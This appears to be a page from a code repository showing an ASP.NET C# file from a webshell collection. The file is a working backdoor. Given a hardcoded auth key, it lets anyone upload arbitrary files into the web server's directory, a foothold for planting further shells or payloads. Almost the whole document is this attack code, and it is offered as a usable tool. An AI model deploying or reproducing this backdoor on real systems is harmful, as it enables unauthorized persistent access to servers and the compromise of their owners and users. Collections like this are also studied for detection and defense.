webshell/aspx/asp.net-backdoors/fileupload.aspx

127 lines
3.8 KiB
Text
Raw Normal View History

2014-05-19 01:10:17 +00:00
<%@ Page Language="C#" %>
<%@ Import Namespace="System.IO" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
private const string AUTHKEY = "woanware";
private const string HEADER = "<html>\n<head>\n<title>filesystembrowser</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
private const string FOOTER = "</body>\n</html>\n";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void Page_Load(object sender, EventArgs e)
{
try
{
if (Request.Params["authkey"] == null)
{
Response.Write(HEADER);
Response.Write(this.GetUploadControls());
Response.Write(FOOTER);
return;
}
if (Request.Params["authkey"] != AUTHKEY)
{
Response.Write(HEADER);
Response.Write(this.GetUploadControls());
Response.Write(FOOTER);
return;
}
if (Request.Params["operation"] != null)
{
if (Request.Params["operation"] == "upload")
{
Response.Write(HEADER);
Response.Write(this.UploadFile());
Response.Write(FOOTER);
}
else
{
Response.Write(HEADER);
Response.Write("Unknown operation");
Response.Write(FOOTER);
}
}
else
{
Response.Write(HEADER);
Response.Write(this.GetUploadControls());
Response.Write(FOOTER);
}
}
catch (Exception ex)
{
Response.Write(HEADER);
Response.Write(ex.Message);
Response.Write(FOOTER);
}
}
/// <summary>
///
/// </summary>
private string UploadFile()
{
try
{
if (Request.Params["authkey"] == null)
{
return string.Empty;
}
if (Request.Params["authkey"] != AUTHKEY)
{
return string.Empty;
}
if (Request.Files.Count != 1)
{
return "No file selected";
}
HttpPostedFile httpPostedFile = Request.Files[0];
int fileLength = httpPostedFile.ContentLength;
byte[] buffer = new byte[fileLength];
httpPostedFile.InputStream.Read(buffer, 0, fileLength);
FileInfo fileInfo = new FileInfo(Request.PhysicalPath);
using (FileStream fileStream = new FileStream(Path.Combine(fileInfo.DirectoryName, Path.GetFileName(httpPostedFile.FileName)), FileMode.Create))
{
fileStream.Write(buffer, 0, buffer.Length);
}
return "File uploaded";
}
catch (Exception ex)
{
return ex.ToString();
}
}
/// <summary>
///
/// </summary>
/// <returns></returns>
private string GetUploadControls()
{
string temp = string.Empty;
temp = "<form enctype=\"multipart/form-data\" action=\"?operation=upload\" method=\"post\">";
temp += "<br>Auth Key: <input type=\"text\" name=\"authKey\"><br>";
temp += "<br>Please specify a file: <input type=\"file\" name=\"file\"></br>";
temp += "<div><input type=\"submit\" value=\"Send\"></div>";
temp += "</form>";
return temp;
}
</script>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->